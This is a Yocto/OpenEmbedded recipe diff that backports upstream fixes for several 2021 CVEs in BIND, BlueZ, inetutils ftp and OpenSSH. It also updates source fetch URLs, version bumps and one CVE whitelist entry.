+From: =?UTF-8?q?Ond=C5=99ej=20Sur=C3=BD?= <ondrej@sury.org>
+Date: Mon, 15 Nov 2021 16:26:52 +0800
+Subject: [PATCH] Enable lame response detection even with disabled lame cache
+
+Previously, when lame cache would be disabled by setting lame-ttl to 0,
+it would also disable lame answer detection. In this commit, we enable
+the lame response detection even when the lame cache is disabled. This
+enables stopping answer processing early rather than going through the
+whole answer processing flow.
+
+CVE: CVE-2021-25219
+
+Upstream-Status: Backport [https://gitlab.isc.org/isc-projects/bind9/-/commit/e4931584a34bdd0a0d18e4d918fb853bf5296787]
+
+Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
+---
+ lib/dns/resolver.c | 23 ++++++++++++-----------
+ 1 file changed, 12 insertions(+), 11 deletions(-)
+
+diff --git a/lib/dns/resolver.c b/lib/dns/resolver.c
+index 50fadc0..9291bd4 100644
+--- a/lib/dns/resolver.c
++++ b/lib/dns/resolver.c
+@@ -10217,25 +10217,26 @@ rctx_badserver(respctx_t *rctx, isc_result_t result) {
+ */
+ static isc_result_t
+ rctx_lameserver(respctx_t *rctx) {
+- isc_result_t result;
++ isc_result_t result = ISC_R_SUCCESS;
+ fetchctx_t *fctx = rctx->fctx;
+ resquery_t *query = rctx->query;
+
+- if (fctx->res->lame_ttl == 0 || ISFORWARDER(query->addrinfo) ||
+- !is_lame(fctx, query->rmessage))
+- {
++ if (ISFORWARDER(query->addrinfo) || !is_lame(fctx, query->rmessage)) {
+ return (ISC_R_SUCCESS);
+ }
+
+ inc_stats(fctx->res, dns_resstatscounter_lame);
+ log_lame(fctx, query->addrinfo);
+- result = dns_adb_marklame(fctx->adb, query->addrinfo, &fctx->name,
+- fctx->type, rctx->now + fctx->res->lame_ttl);
+- if (result != ISC_R_SUCCESS) {
+- isc_log_write(dns_lctx, DNS_LOGCATEGORY_RESOLVER,
+- DNS_LOGMODULE_RESOLVER, ISC_LOG_ERROR,
+- "could not mark server as lame: %s",
+- isc_result_totext(result));
++ if (fctx->res->lame_ttl != 0) {
++ result = dns_adb_marklame(fctx->adb, query->addrinfo,
++ &fctx->name, fctx->type,
++ rctx->now + fctx->res->lame_ttl);
++ if (result != ISC_R_SUCCESS) {
++ isc_log_write(dns_lctx, DNS_LOGCATEGORY_RESOLVER,
++ DNS_LOGMODULE_RESOLVER, ISC_LOG_ERROR,
++ "could not mark server as lame: %s",
++ isc_result_totext(result));
++ }
+ }
+ rctx->broken_server = DNS_R_LAME;
+ rctx->next_server = true;
+--
+2.17.1
+
diff --git a/meta/recipes-connectivity/bind/bind_9.16.16.bb b/meta/recipes-connectivity/bind/bind_9.16.16.bb
index 27aa6221ba1..4bfdeca9cee 100644
--- a/meta/recipes-connectivity/bind/bind_9.16.16.bb
+++ b/meta/recipes-connectivity/bind/bind_9.16.16.bb
@@ -18,6 +18,8 @@ SRC_URI = "https://ftp.isc.org/isc/bind9/${PV}/${BPN}-${PV}.tar.xz \
file://bind-ensure-searching-for-json-headers-searches-sysr.patch \
file://0001-named-lwresd-V-and-start-log-hide-build-options.patch \
file://0001-avoid-start-failure-with-bind-user.patch \
+ file://CVE-2021-25219-1.patch \
+ file://CVE-2021-25219-2.patch \
"
SRC_URI[sha256sum] = "6c913902adf878e7dc5e229cea94faefc9d40f44775a30213edd08860f761d7b"
@@ -26,6 +28,10 @@ UPSTREAM_CHECK_URI = "https://ftp.isc.org/isc/bind9/"
# stay at 9.16 follow the ESV versions divisible by 4
UPSTREAM_CHECK_REGEX = "(?P<pver>9.(16|20|24|28)(\.\d+)+(-P\d+)*)/"
+# Issue only affects dhcpd with recent bind versions. We don't ship dhcpd anymore
+# so the issue doesn't affect us.
+CVE_CHECK_WHITELIST += "CVE-2019-6470"
+
inherit autotools update-rc.d systemd useradd pkgconfig multilib_header update-alternatives
# PACKAGECONFIGs readline and libedit should NOT be set at same time
diff --git a/meta/recipes-connectivity/bluez5/bluez5.inc b/meta/recipes-connectivity/bluez5/bluez5.inc
index a7b628ce1bc..22e0f336100 100644
--- a/meta/recipes-connectivity/bluez5/bluez5.inc
+++ b/meta/recipes-connectivity/bluez5/bluez5.inc
@@ -52,6 +52,8 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/bluetooth/bluez-${PV}.tar.xz \
${@bb.utils.contains('DISTRO_FEATURES', 'systemd', '', 'file://0001-Allow-using-obexd-without-systemd-in-the-user-sessio.patch', d)} \
file://0001-tests-add-a-target-for-building-tests-without-runnin.patch \
file://0001-test-gatt-Fix-hung-issue.patch \
+ file://0001-adapter-Fix-storing-discoverable-setting.patch \
+ file://0001-shared-gatt-server-Fix-not-properly-checking-for-sec.patch \
"
S = "${WORKDIR}/bluez-${PV}"
diff --git a/meta/recipes-connectivity/bluez5/bluez5/0001-adapter-Fix-storing-discoverable-setting.patch b/meta/recipes-connectivity/bluez5/bluez5/0001-adapter-Fix-storing-discoverable-setting.patch
new file mode 100644
index 00000000000..c2a5edd2264
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/0001-adapter-Fix-storing-discoverable-setting.patch
@@ -0,0 +1,100 @@
+From b497b5942a8beb8f89ca1c359c54ad67ec843055 Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Thu, 24 Jun 2021 16:32:04 -0700
+Subject: [PATCH] adapter: Fix storing discoverable setting
+
+discoverable setting shall only be store when changed via Discoverable
+property and not when discovery client set it as that be considered
+temporary just for the lifetime of the discovery.
+
+Upstream-Status: Backport
+(https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/?id=b497b5942a8beb8f89ca1c359c54ad67ec843055)
+
+CVE: CVE-2021-3658
+
+Signed-off-by: Trevor Gamblin <trevor.gamblin@windriver.com>
+
+---
+ src/adapter.c | 35 ++++++++++++++++++++++-------------
+ 1 file changed, 22 insertions(+), 13 deletions(-)
+
+diff --git a/src/adapter.c b/src/adapter.c
+index 12e4ff5c0..663b778e4 100644
+--- a/src/adapter.c
++++ b/src/adapter.c
+@@ -560,7 +560,11 @@ static void settings_changed(struct btd_adapter *adapter, uint32_t settings)
+ if (changed_mask & MGMT_SETTING_DISCOVERABLE) {
+ g_dbus_emit_property_changed(dbus_conn, adapter->path,
+ ADAPTER_INTERFACE, "Discoverable");
+- store_adapter_info(adapter);
++ /* Only persist discoverable setting if it was not set
++ * temporarily by discovery.
++ */
++ if (!adapter->discovery_discoverable)
++ store_adapter_info(adapter);
+ btd_adv_manager_refresh(adapter->adv_manager);
+ }
+
+@@ -2162,8 +2166,6 @@ static bool filters_equal(struct mgmt_cp_start_service_discovery *a,
+ static int update_discovery_filter(struct btd_adapter *adapter)
+ {
+ struct mgmt_cp_start_service_discovery *sd_cp;
+- GSList *l;
+-
+
+ DBG("");
+
+@@ -2173,17 +2175,24 @@ static int update_discovery_filter(struct btd_adapter *adapter)
+ return -ENOMEM;
+ }
+
+- for (l = adapter->discovery_list; l; l = g_slist_next(l)) {
+- struct discovery_client *client = l->data;
++ /* Only attempt to overwrite current discoverable setting when not
++ * discoverable.
++ */
++ if (!(adapter->current_settings & MGMT_OP_SET_DISCOVERABLE)) {
++ GSList *l;
+
+- if (!client->discovery_filter)
+- continue;
++ for (l = adapter->discovery_list; l; l = g_slist_next(l)) {
++ struct discovery_client *client = l->data;
+
+- if (client->discovery_filter->discoverable)
+- break;
+- }
++ if (!client->discovery_filter)
++ continue;
+
+- set_discovery_discoverable(adapter, l ? true : false);
++ if (client->discovery_filter->discoverable) {
++ set_discovery_discoverable(adapter, true);
++ break;
++ }
++ }
++ }
+
+ /*
+ * If filters are equal, then don't update scan, except for when
+@@ -2216,8 +2225,7 @@ static int discovery_stop(struct discovery_client *client)
+ return 0;
+ }
+
+- if (adapter->discovery_discoverable)
+- set_discovery_discoverable(adapter, false);
++ set_discovery_discoverable(adapter, false);
+
+ /*
+ * In the idle phase of a discovery, there is no need to stop it
+@@ -6913,6 +6921,7 @@ static void adapter_stop(struct btd_adapter *adapter)
+ g_free(adapter->current_discovery_filter);
+ adapter->current_discovery_filter = NULL;
+
++ set_discovery_discoverable(adapter, false);
+ adapter->discovering = false;
+
+ while (adapter->connections) {
+--
+2.33.0
+
diff --git a/meta/recipes-connectivity/bluez5/bluez5/0001-shared-gatt-server-Fix-not-properly-checking-for-sec.patch b/meta/recipes-connectivity/bluez5/bluez5/0001-shared-gatt-server-Fix-not-properly-checking-for-sec.patch
new file mode 100644
index 00000000000..422fd211cae
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/0001-shared-gatt-server-Fix-not-properly-checking-for-sec.patch
@@ -0,0 +1,113 @@
+From 00da0fb4972cf59e1c075f313da81ea549cb8738 Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Tue, 2 Mar 2021 11:38:33 -0800
+Subject: [PATCH] shared/gatt-server: Fix not properly checking for secure
+ flags
+
+When passing the mask to check_permissions all valid permissions for
+the operation must be set including BT_ATT_PERM_SECURE flags.
+
+Upstream-Status: Backport
+(https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/?id=00da0fb4972cf59e1c075f313da81ea549cb8738)
+
+CVE: CVE-2021-0129
+
+Signed-off-by: Trevor Gamblin <trevor.gamblin@windriver.com>
+---
+ src/shared/att-types.h | 8 ++++++++
+ src/shared/gatt-server.c | 25 +++++++------------------
+ 2 files changed, 15 insertions(+), 18 deletions(-)
+
+diff --git a/src/shared/att-types.h b/src/shared/att-types.h
+index 7108b4e94..3adc05d9e 100644
+--- a/src/shared/att-types.h
++++ b/src/shared/att-types.h
+@@ -129,6 +129,14 @@ struct bt_att_pdu_error_rsp {
+ #define BT_ATT_PERM_WRITE_SECURE 0x0200
+ #define BT_ATT_PERM_SECURE (BT_ATT_PERM_READ_SECURE | \
+ BT_ATT_PERM_WRITE_SECURE)
++#define BT_ATT_PERM_READ_MASK (BT_ATT_PERM_READ | \
++ BT_ATT_PERM_READ_AUTHEN | \
++ BT_ATT_PERM_READ_ENCRYPT | \
++ BT_ATT_PERM_READ_SECURE)
++#define BT_ATT_PERM_WRITE_MASK (BT_ATT_PERM_WRITE | \
++ BT_ATT_PERM_WRITE_AUTHEN | \
++ BT_ATT_PERM_WRITE_ENCRYPT | \
++ BT_ATT_PERM_WRITE_SECURE)
+
+ /* GATT Characteristic Properties Bitfield values */
+ #define BT_GATT_CHRC_PROP_BROADCAST 0x01
+diff --git a/src/shared/gatt-server.c b/src/shared/gatt-server.c
+index b5f7de7dc..970c35f94 100644
+--- a/src/shared/gatt-server.c
++++ b/src/shared/gatt-server.c
+@@ -444,9 +444,7 @@ static void process_read_by_type(struct async_read_op *op)
+ return;
+ }
+
+- ecode = check_permissions(server, attr, BT_ATT_PERM_READ |
+- BT_ATT_PERM_READ_AUTHEN |
+- BT_ATT_PERM_READ_ENCRYPT);
++ ecode = check_permissions(server, attr, BT_ATT_PERM_READ_MASK);
+ if (ecode)
+ goto error;
+
+@@ -811,9 +809,7 @@ static void write_cb(struct bt_att_chan *chan, uint8_t opcode, const void *pdu,
+ (opcode == BT_ATT_OP_WRITE_REQ) ? "Req" : "Cmd",
+ handle);
+
+- ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE |
+- BT_ATT_PERM_WRITE_AUTHEN |
+- BT_ATT_PERM_WRITE_ENCRYPT);
++ ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK);
+ if (ecode)
+ goto error;
+
+@@ -913,9 +909,7 @@ static void handle_read_req(struct bt_att_chan *chan,
+ opcode == BT_ATT_OP_READ_BLOB_REQ ? "Blob " : "",
+ handle);
+
+- ecode = check_permissions(server, attr, BT_ATT_PERM_READ |
+- BT_ATT_PERM_READ_AUTHEN |
+- BT_ATT_PERM_READ_ENCRYPT);
++ ecode = check_permissions(server, attr, BT_ATT_PERM_READ_MASK);
+ if (ecode)
+ goto error;
+
+@@ -1051,9 +1045,8 @@ static void read_multiple_complete_cb(struct gatt_db_attribute *attr, int err,
+ goto error;
+ }
+
+- ecode = check_permissions(data->server, next_attr, BT_ATT_PERM_READ |
+- BT_ATT_PERM_READ_AUTHEN |
+- BT_ATT_PERM_READ_ENCRYPT);
++ ecode = check_permissions(data->server, next_attr,
++ BT_ATT_PERM_READ_MASK);
+ if (ecode)
+ goto error;
+
+@@ -1129,9 +1122,7 @@ static void read_multiple_cb(struct bt_att_chan *chan, uint8_t opcode,
+ goto error;
+ }
+
+- ecode = check_permissions(data->server, attr, BT_ATT_PERM_READ |
+- BT_ATT_PERM_READ_AUTHEN |
+- BT_ATT_PERM_READ_ENCRYPT);
++ ecode = check_permissions(data->server, attr, BT_ATT_PERM_READ_MASK);
+ if (ecode)
+ goto error;
+
+@@ -1308,9 +1299,7 @@ static void prep_write_cb(struct bt_att_chan *chan, uint8_t opcode,
+ util_debug(server->debug_callback, server->debug_data,
+ "Prep Write Req - handle: 0x%04x", handle);
+
+- ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE |
+- BT_ATT_PERM_WRITE_AUTHEN |
+- BT_ATT_PERM_WRITE_ENCRYPT);
++ ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK);
+ if (ecode)
+ goto error;
+
+--
+2.31.1
+
diff --git a/meta/recipes-connectivity/connman/connman-gnome_0.7.bb b/meta/recipes-connectivity/connman/connman-gnome_0.7.bb
index af986c4eab3..e4eeb3c726b 100644
--- a/meta/recipes-connectivity/connman/connman-gnome_0.7.bb
+++ b/meta/recipes-connectivity/connman/connman-gnome_0.7.bb
@@ -10,7 +10,7 @@ DEPENDS = "gtk+3 dbus-glib dbus-glib-native intltool-native gettext-native"
# 0.7 tag
SRCREV = "cf3c325b23dae843c5499a113591cfbc98acb143"
-SRC_URI = "git://github.com/connectivity/connman-gnome.git \
+SRC_URI = "git://github.com/connectivity/connman-gnome.git;branch=master;protocol=https \
file://0001-Removed-icon-from-connman-gnome-about-applet.patch \
file://null_check_for_ipv4_config.patch \
file://images/ \
diff --git a/meta/recipes-connectivity/connman/connman.inc b/meta/recipes-connectivity/connman/connman.inc
index 776bbfbff23..bd1dfd5b010 100644
--- a/meta/recipes-connectivity/connman/connman.inc
+++ b/meta/recipes-connectivity/connman/connman.inc
@@ -15,6 +15,8 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \
inherit autotools pkgconfig systemd update-rc.d update-alternatives
+CVE_PRODUCT = "connman connection_manager"
+
DEPENDS = "dbus glib-2.0 ppp"
EXTRA_OECONF += "\
diff --git a/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch b/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch
new file mode 100644
index 00000000000..f05c6969292
--- /dev/null
+++ b/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch
@@ -0,0 +1,67 @@
+From 98ccabf68e5b3f0a177bd1925581753d10041448 Mon Sep 17 00:00:00 2001
+From: Simon Josefsson <simon@josefsson.org>
+Date: Wed, 1 Sep 2021 09:09:50 +0200
+Subject: [PATCH] ftp: check that PASV/LSPV addresses match.
+
+* NEWS: Mention change.
+* ftp/ftp.c (initconn): Validate returned addresses.
+
+CVE: CVE-2021-40491
+
+Upstream-Status: Backport
+[https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=58cb043b190fd04effdaea7c9403416b436e50dd]
+
+Signed-off-by: Yi Zhao <yi.zhao@windriver.com>
+---
+ ftp/ftp.c | 21 +++++++++++++++++++++
+ 1 files changed, 21 insertions(+)
+
+diff --git a/ftp/ftp.c b/ftp/ftp.c
+index d21dbdd..7513539 100644
+--- a/ftp/ftp.c
++++ b/ftp/ftp.c
+@@ -1365,6 +1365,13 @@ initconn (void)
+ uint32_t *pu32 = (uint32_t *) &data_addr_sa4->sin_addr.s_addr;
+ pu32[0] = htonl ( (h[0] << 24) | (h[1] << 16) | (h[2] << 8) | h[3]);
+ }
++ if (data_addr_sa4->sin_addr.s_addr
++ != ((struct sockaddr_in *) &hisctladdr)->sin_addr.s_addr)
++ {
++ printf ("Passive mode address mismatch.\n");
++ (void) command ("ABOR"); /* Cancel any open connection. */
++ goto bad;
++ }
+ } /* LPSV IPv4 */
+ else /* IPv6 */
+ {
+@@ -1395,6 +1402,13 @@ initconn (void)
+ pu32[2] = htonl ( (h[8] << 24) | (h[9] << 16) | (h[10] << 8) | h[11]);
+ pu32[3] = htonl ( (h[12] << 24) | (h[13] << 16) | (h[14] << 8) | h[15]);
+ }
++ if (data_addr_sa6->sin6_addr.s6_addr
++ != ((struct sockaddr_in6 *) &hisctladdr)->sin6_addr.s6_addr)
++ {
++ printf ("Passive mode address mismatch.\n");
++ (void) command ("ABOR"); /* Cancel any open connection. */
++ goto bad;
++ }
+ } /* LPSV IPv6 */
+ }
+ else /* !EPSV && !LPSV */
+@@ -1415,6 +1429,13 @@ initconn (void)
+ | ((a2 & 0xff) << 8) | (a3 & 0xff) );
+ data_addr_sa4->sin_port =
+ htons (((p0 & 0xff) << 8) | (p1 & 0xff));
++ if (data_addr_sa4->sin_addr.s_addr
++ != ((struct sockaddr_in *) &hisctladdr)->sin_addr.s_addr)
++ {
++ printf ("Passive mode address mismatch.\n");
++ (void) command ("ABOR"); /* Cancel any open connection. */
++ goto bad;
++ }
+ } /* PASV */
+ else
+ {
+--
+2.17.1
+
diff --git a/meta/recipes-connectivity/inetutils/inetutils_2.0.bb b/meta/recipes-connectivity/inetutils/inetutils_2.0.bb
index a4d05b05420..d299bc359e8 100644
--- a/meta/recipes-connectivity/inetutils/inetutils_2.0.bb
+++ b/meta/recipes-connectivity/inetutils/inetutils_2.0.bb
@@ -20,6 +20,7 @@ SRC_URI = "${GNU_MIRROR}/inetutils/inetutils-${PV}.tar.xz \
file://tftpd.xinetd.inetutils \
file://inetutils-1.9-PATH_PROCNET_DEV.patch \
file://inetutils-only-check-pam_appl.h-when-pam-enabled.patch \
+ file://CVE-2021-40491.patch \
"
SRC_URI[md5sum] = "5e1018502cd131ed8e42339f6b5c98aa"
diff --git a/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb b/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb
index 9a83898e52e..5213b28345e 100644
--- a/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb
+++ b/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb
@@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2d5025d4aa3495befef8f17206a5b0a1"
DEPENDS = "avahi"
-SRC_URI = "git://github.com/lathiat/nss-mdns \
+SRC_URI = "git://github.com/lathiat/nss-mdns;branch=master;protocol=https \
"
SRCREV = "41c9c5e78f287ed4b41ac438c1873fa71bfa70ae"
diff --git a/meta/recipes-connectivity/libuv/libuv_1.41.0.bb b/meta/recipes-connectivity/libuv/libuv_1.41.0.bb
index 4987331dc8f..e15d3389419 100644
--- a/meta/recipes-connectivity/libuv/libuv_1.41.0.bb
+++ b/meta/recipes-connectivity/libuv/libuv_1.41.0.bb
@@ -6,7 +6,7 @@ LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://LICENSE;md5=a68902a430e32200263d182d44924d47"
SRCREV = "1dff88e5161cba5c59276d2070d2e304e4dcb242"
-SRC_URI = "git://github.com/libuv/libuv;branch=v1.x"
+SRC_URI = "git://github.com/libuv/libuv;branch=v1.x;protocol=https"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb b/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb
index f170cf46505..b4cbc1a76c4 100644
--- a/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb
+++ b/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb
@@ -8,7 +8,7 @@ SRCREV = "90f3fe28aa25135b7e4a54a7816388913bfd4a2a"
PV = "20201225"
PE = "1"
-SRC_URI = "git://gitlab.gnome.org/GNOME/mobile-broadband-provider-info.git;protocol=https"
+SRC_URI = "git://gitlab.gnome.org/GNOME/mobile-broadband-provider-info.git;protocol=https;branch=master"
S = "${WORKDIR}/git"
inherit autotools
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch
new file mode 100644
index 00000000000..9ca7c2f202b
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch
@@ -0,0 +1,49 @@
+From 1f0707e8e78ef290fd0f229df3fcd2236f29db89 Mon Sep 17 00:00:00 2001
+From: Changqing Li <changqing.li@windriver.com>
+Date: Thu, 28 Oct 2021 11:11:05 +0800
+Subject: [PATCH] upstream: need initgroups() before setresgid(); reported by
+ anton@,
+
+ok deraadt@
+
+OpenBSD-Commit-ID: 6aa003ee658b316960d94078f2a16edbc25087ce
+
+CVE: CVE-2021-41617
+Upstream-Status: [Backport]
+https://github.com/openssh/openssh-portable/commit/f3cbe43e28fe71427d41cfe3a17125b972710455
+https://github.com/openssh/openssh-portable/commit/bf944e3794eff5413f2df1ef37cddf96918c6bde
+
+Signed-off-by: Changqing Li <changqing.li@windriver.com>
+---
+ misc.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/misc.c b/misc.c
+index d988ce3..33eca1c 100644
+--- a/misc.c
++++ b/misc.c
+@@ -56,6 +56,7 @@
+ #ifdef HAVE_PATHS_H
+ # include <paths.h>
+ #include <pwd.h>
++#include <grp.h>
+ #endif
+ #ifdef SSH_TUN_OPENBSD
+ #include <net/if.h>
+@@ -2629,6 +2630,13 @@ subprocess(const char *tag, const char *command,
+ }
+ closefrom(STDERR_FILENO + 1);
+
++ if (geteuid() == 0 &&
++ initgroups(pw->pw_name, pw->pw_gid) == -1) {
++ error("%s: initgroups(%s, %u): %s", tag,
++ pw->pw_name, (u_int)pw->pw_gid, strerror(errno));
++ _exit(1);
++ }
++
+ if (setresgid(pw->pw_gid, pw->pw_gid, pw->pw_gid) == -1) {
+ error("%s: setresgid %u: %s", tag, (u_int)pw->pw_gid,
+ strerror(errno));
+--
+2.17.1
+
diff --git a/meta/recipes-connectivity/openssh/openssh_8.5p1.bb b/meta/recipes-connectivity/openssh/openssh_8.5p1.bb
index c6de5198849..9a5f37bc39c 100644
--- a/meta/recipes-connectivity/openssh/openssh_8.5p1.bb
+++ b/meta/recipes-connectivity/openssh/openssh_8.5p1.bb
@@ -24,6 +24,7 @@ SRC_URI = "http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-${PV}.tar
file://fix-potential-signed-overflow-in-pointer-arithmatic.patch \
file://sshd_check_keys \
file://add-test-support-for-busybox.patch \
+ file://CVE-2021-41617.patch \
"
SRC_URI[sha256sum] = "f52f3f41d429aa9918e38cf200af225ccdd8e66f052da572870c89737646ec25"
diff --git a/meta/recipes-connectivity/openssl/openssl_1.1.1k.bb b/meta/recipes-connectivity/openssl/openssl_1.1.1l.bb
index e518cb6a02e..9ea5c4c81fd 100644
--- a/meta/recipes-connectivity/openssl/openssl_1.1.1k.bb
+++ b/meta/recipes-connectivity/openssl/openssl_1.1.1l.bb
@@ -28,7 +28,7 @@ SRC_URI_append_riscv32 = " \
file://0004-Fixup-support-for-io_pgetevents_time64-syscall.patch \
"
-SRC_URI[sha256sum] = "892a0875b9872acd04a9fde79b1f943075d5ea162415de3047c327df33fbaee5"
+SRC_URI[sha256sum] = "0b7a3e5e59c34827fe0c3a74b7ec8baef302b98fa80088d7f9153aa16fa76bd1"
inherit lib_package multilib_header multilib_script ptest
MULTILIB_SCRIPTS = "${PN}-bin:${bindir}/c_rehash"
diff --git a/meta/recipes-core/dbus-wait/dbus-wait_git.bb b/meta/recipes-core/dbus-wait/dbus-wait_git.bb
index 677768d35a3..b39f7523c0d 100644
--- a/meta/recipes-core/dbus-wait/dbus-wait_git.bb
+++ b/meta/recipes-core/dbus-wait/dbus-wait_git.bb
@@ -11,7 +11,7 @@ SRCREV = "6cc6077a36fe2648a5f993fe7c16c9632f946517"
PV = "0.1+git${SRCPV}"
PR = "r2"
-SRC_URI = "git://git.yoctoproject.org/${BPN}"
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"
UPSTREAM_CHECK_COMMITS = "1"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-core/expat/expat_2.2.10.bb b/meta/recipes-core/expat/expat_2.2.10.bb
index a54d832e52d..08e8ff1cea4 100644
--- a/meta/recipes-core/expat/expat_2.2.10.bb
+++ b/meta/recipes-core/expat/expat_2.2.10.bb
@@ -6,12 +6,16 @@ LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://COPYING;md5=9e2ce3b3c4c0f2670883a23bbd7c37a9"
-SRC_URI = "${SOURCEFORGE_MIRROR}/expat/expat-${PV}.tar.bz2 \
+VERSION_TAG = "${@d.getVar('PV').replace('.', '_')}"
+
+SRC_URI = "https://github.com/libexpat/libexpat/releases/download/R_${VERSION_TAG}/expat-${PV}.tar.bz2 \
file://libtool-tag.patch \
file://run-ptest \
file://0001-Add-output-of-tests-result.patch \
"
+UPSTREAM_CHECK_URI = "https://github.com/libexpat/libexpat/releases/"
+
SRC_URI[sha256sum] = "b2c160f1b60e92da69de8e12333096aeb0c3bf692d41c60794de278af72135a5"
EXTRA_OECMAKE_class-native += "-DEXPAT_BUILD_DOCS=OFF"
diff --git a/meta/recipes-core/fts/fts_1.2.7.bb b/meta/recipes-core/fts/fts_1.2.7.bb
index ea820cb0c34..d3b0f31eda4 100644
--- a/meta/recipes-core/fts/fts_1.2.7.bb
+++ b/meta/recipes-core/fts/fts_1.2.7.bb
@@ -10,7 +10,7 @@ SECTION = "libs"
SRCREV = "0bde52df588e8969879a2cae51c3a4774ec62472"
-SRC_URI = "git://github.com/pullmoll/musl-fts.git"
+SRC_URI = "git://github.com/pullmoll/musl-fts.git;branch=master;protocol=https"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-core/glibc/cross-localedef-native_2.33.bb b/meta/recipes-core/glibc/cross-localedef-native_2.33.bb
index ec59c6ba107..22d3f96c091 100644
--- a/meta/recipes-core/glibc/cross-localedef-native_2.33.bb
+++ b/meta/recipes-core/glibc/cross-localedef-native_2.33.bb
@@ -20,7 +20,7 @@ inherit native
FILESEXTRAPATHS =. "${FILE_DIRNAME}/${PN}:${FILE_DIRNAME}/glibc:"
SRC_URI = "${GLIBC_GIT_URI};branch=${SRCBRANCH};name=glibc \
- git://github.com/kraj/localedef;branch=master;name=localedef;destsuffix=git/localedef \
+ git://github.com/kraj/localedef;branch=master;name=localedef;destsuffix=git/localedef;protocol=https \
\
file://0001-localedef-Add-hardlink-resolver-from-util-linux.patch \
file://0002-localedef-fix-ups-hardlink-to-make-it-compile.patch \
diff --git a/meta/recipes-core/glibc/glibc-version.inc b/meta/recipes-core/glibc/glibc-version.inc
index 3a95173175b..4d69187961e 100644
--- a/meta/recipes-core/glibc/glibc-version.inc
+++ b/meta/recipes-core/glibc/glibc-version.inc
@@ -1,6 +1,6 @@
SRCBRANCH ?= "release/2.33/master"
PV = "2.33"
-SRCREV_glibc ?= "9826b03b747b841f5fc6de2054bf1ef3f5c4bdf3"
+SRCREV_glibc ?= "6090cf1330faf2deb17285758f327cb23b89ebf1"
SRCREV_localedef ?= "bd644c9e6f3e20c5504da1488448173c69c56c28"
GLIBC_GIT_URI ?= "git://sourceware.org/git/glibc.git"
diff --git a/meta/recipes-core/glibc/glibc/0001-nptl-Remove-private-futex-optimization-BZ-27304.patch b/meta/recipes-core/glibc/glibc/0001-nptl-Remove-private-futex-optimization-BZ-27304.patch
deleted file mode 100644
index 39fde5b7854..00000000000
--- a/meta/recipes-core/glibc/glibc/0001-nptl-Remove-private-futex-optimization-BZ-27304.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From c4ad832276f4dadfa40904109b26a521468f66bc Mon Sep 17 00:00:00 2001
-From: Florian Weimer <fweimer@redhat.com>
-Date: Thu, 4 Feb 2021 15:00:20 +0100
-Subject: [PATCH] nptl: Remove private futex optimization [BZ #27304]
-
-It is effectively used, unexcept for pthread_cond_destroy, where we do
-not want it; see bug 27304. The internal locks do not support a
-process-shared mode.
-
-This fixes commit dc6cfdc934db9997c33728082d63552b9eee4563 ("nptl:
-Move pthread_cond_destroy implementation into libc").
-
-Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org>
-
-Upstream-Status: Backport [https://sourceware.org/bugzilla/show_bug.cgi?id=27304]
-Signed-off-by: Yanfei Xu <yanfei.xu@windriver.com>
----
- sysdeps/nptl/lowlevellock-futex.h | 14 +-------------
- 1 file changed, 1 insertion(+), 13 deletions(-)
-
-diff --git a/sysdeps/nptl/lowlevellock-futex.h b/sysdeps/nptl/lowlevellock-futex.h
-index ecb729da6b..ca96397a4a 100644
---- a/sysdeps/nptl/lowlevellock-futex.h
-+++ b/sysdeps/nptl/lowlevellock-futex.h
-@@ -50,20 +50,8 @@
- #define LLL_SHARED FUTEX_PRIVATE_FLAG
-
- #ifndef __ASSEMBLER__
--
--# if IS_IN (libc) || IS_IN (rtld)
--/* In libc.so or ld.so all futexes are private. */
--# define __lll_private_flag(fl, private) \
-- ({ \
-- /* Prevent warnings in callers of this macro. */ \
-- int __lll_private_flag_priv __attribute__ ((unused)); \
-- __lll_private_flag_priv = (private); \
-- ((fl) | FUTEX_PRIVATE_FLAG); \
-- })
--# else
--# define __lll_private_flag(fl, private) \
-+# define __lll_private_flag(fl, private) \
- (((fl) | FUTEX_PRIVATE_FLAG) ^ (private))
--# endif
-
- # define lll_futex_syscall(nargs, futexp, op, ...) \
- ({ \
---
-2.27.0
-
